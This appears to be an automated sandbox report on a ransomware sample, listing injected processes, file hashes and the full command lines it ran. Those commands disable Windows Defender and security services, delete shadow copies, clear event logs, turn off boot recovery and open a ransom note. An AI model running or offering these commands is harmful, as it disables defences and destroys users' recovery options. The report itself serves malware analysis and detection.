Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 576 wrote to memory of 528 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 576 wrote to memory of 528 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 576 wrote to memory of 528 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 556 wrote to memory of 552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 556 wrote to memory of 552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 556 wrote to memory of 552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1464 wrote to memory of 632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1464 wrote to memory of 632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1464 wrote to memory of 632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1064 wrote to memory of 540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1064 wrote to memory of 540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1064 wrote to memory of 540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 2044 wrote to memory of 2040 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2044 wrote to memory of 2040 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2044 wrote to memory of 2040 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1576 wrote to memory of 1996 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1576 wrote to memory of 1996 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1576 wrote to memory of 1996 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1820 wrote to memory of 1540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1820 wrote to memory of 1540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1820 wrote to memory of 1540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\net.exe
PID 1196 wrote to memory of 1636 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1196 wrote to memory of 1636 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1196 wrote to memory of 1636 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe

"C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\ihr6_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe"

C:\Windows\system32\PING.EXE

ping.exe -n 5 127.0.0.1

Network

N/A

Files

memory/576-54-0x0000000000000000-mapping.dmp

memory/528-55-0x0000000000000000-mapping.dmp

memory/556-56-0x0000000000000000-mapping.dmp

memory/552-57-0x0000000000000000-mapping.dmp

memory/1464-58-0x0000000000000000-mapping.dmp

memory/632-59-0x0000000000000000-mapping.dmp

memory/1064-60-0x0000000000000000-mapping.dmp

memory/540-61-0x0000000000000000-mapping.dmp

memory/2044-62-0x0000000000000000-mapping.dmp

memory/2040-63-0x0000000000000000-mapping.dmp

memory/1576-64-0x0000000000000000-mapping.dmp

memory/1996-65-0x0000000000000000-mapping.dmp

memory/1820-66-0x0000000000000000-mapping.dmp

memory/1540-67-0x0000000000000000-mapping.dmp

memory/1196-68-0x0000000000000000-mapping.dmp

memory/1636-69-0x0000000000000000-mapping.dmp

memory/1836-70-0x0000000000000000-mapping.dmp

memory/2012-71-0x0000000000000000-mapping.dmp

memory/1672-72-0x0000000000000000-mapping.dmp

memory/1892-73-0x0000000000000000-mapping.dmp

memory/1952-74-0x0000000000000000-mapping.dmp

memory/624-75-0x0000000000000000-mapping.dmp

memory/1508-76-0x0000000000000000-mapping.dmp

memory/1396-77-0x0000000000000000-mapping.dmp

memory/1620-78-0x0000000000000000-mapping.dmp

memory/1096-79-0x0000000000000000-mapping.dmp

memory/528-80-0x0000000000000000-mapping.dmp

memory/1452-81-0x0000000000000000-mapping.dmp

memory/792-82-0x0000000000000000-mapping.dmp

memory/680-83-0x0000000000000000-mapping.dmp

memory/872-84-0x0000000000000000-mapping.dmp

memory/2032-85-0x0000000000000000-mapping.dmp

memory/1996-86-0x0000000000000000-mapping.dmp

memory/760-87-0x0000000000000000-mapping.dmp

memory/988-88-0x0000000000000000-mapping.dmp

memory/288-89-0x0000000000000000-mapping.dmp

memory/1412-90-0x0000000000000000-mapping.dmp

memory/572-91-0x0000000000000000-mapping.dmp

memory/1068-92-0x0000000000000000-mapping.dmp

memory/1908-93-0x0000000000000000-mapping.dmp

memory/1768-94-0x0000000000000000-mapping.dmp

memory/1676-95-0x0000000000000000-mapping.dmp

memory/892-96-0x0000000000000000-mapping.dmp

memory/1460-97-0x0000000000000000-mapping.dmp

memory/836-98-0x0000000000000000-mapping.dmp

memory/2040-99-0x0000000000000000-mapping.dmp

memory/360-100-0x0000000000000000-mapping.dmp

memory/1252-101-0x0000000000000000-mapping.dmp

memory/744-102-0x0000000000000000-mapping.dmp

memory/1212-103-0x0000000000000000-mapping.dmp

memory/1692-104-0x0000000000000000-mapping.dmp

memory/1712-105-0x0000000000000000-mapping.dmp

memory/1152-106-0x0000000000000000-mapping.dmp

memory/468-107-0x0000000000000000-mapping.dmp

memory/632-108-0x0000000000000000-mapping.dmp

memory/2028-109-0x0000000000000000-mapping.dmp

memory/1584-110-0x0000000000000000-mapping.dmp

memory/1688-111-0x0000000000000000-mapping.dmp

memory/816-112-0x0000000000000000-mapping.dmp

memory/816-113-0x000007FEFC311000-0x000007FEFC313000-memory.dmp

memory/960-114-0x0000000000000000-mapping.dmp

memory/540-116-0x0000000000000000-mapping.dmp

memory/1200-118-0x0000000000000000-mapping.dmp

memory/904-119-0x0000000000000000-mapping.dmp

memory/1284-120-0x0000000000000000-mapping.dmp

memory/268-122-0x000007FEF37D0000-0x000007FEF432D000-memory.dmp

memory/268-124-0x0000000002572000-0x0000000002574000-memory.dmp

memory/268-123-0x0000000002570000-0x0000000002572000-memory.dmp

memory/268-125-0x0000000002574000-0x0000000002577000-memory.dmp

memory/268-126-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

memory/268-127-0x000000000257B000-0x000000000259A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d231001ebde76004956dc1ebf05bfe89
SHA1 e12511cd49c12b1ee95cc77c079c29ca6fcb5ee6
SHA256 8c4be0808f55d0360e03f072cc6405d45db123d4d48cb1e0498ba0d7fa126912
SHA512 933d3e1e17fa1b01943c77874330e86c01473d48a36b91b3342c6ed95ce3818a599f983e5725ad978158c6653816852192bf272bd4cec9dd4a322bd0a8ece477

memory/2108-130-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp

memory/2108-131-0x000000001B720000-0x000000001BA1F000-memory.dmp

memory/2108-132-0x00000000026D4000-0x00000000026D7000-memory.dmp

memory/2108-133-0x00000000026DB000-0x00000000026FA000-memory.dmp

C:\ihr6_HOW_TO_DECRYPT.txt

MD5 107704bd1e26587457b7c672bd711880
SHA1 83d11d409c0ada8e0c2e80308e49b7184cde666f
SHA256 6e402744949bc5490c0226601aff1ce9387a001c194b43a3cc7f362b9abce5f7
SHA512 b811816bd9a9d3da6ab03391b7b895f989daf7dc04ea3b60349e8ef4fff798acdc65eaefa31d2c58da698253693de233b1ead5eb15ba7dd41df1db66e07d3d8b

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-23 14:55

Reported

2022-03-23 14:58

Platform

win10v2004-en-20220113

Max time kernel

1s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe

"C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe"

Network

Files

N/A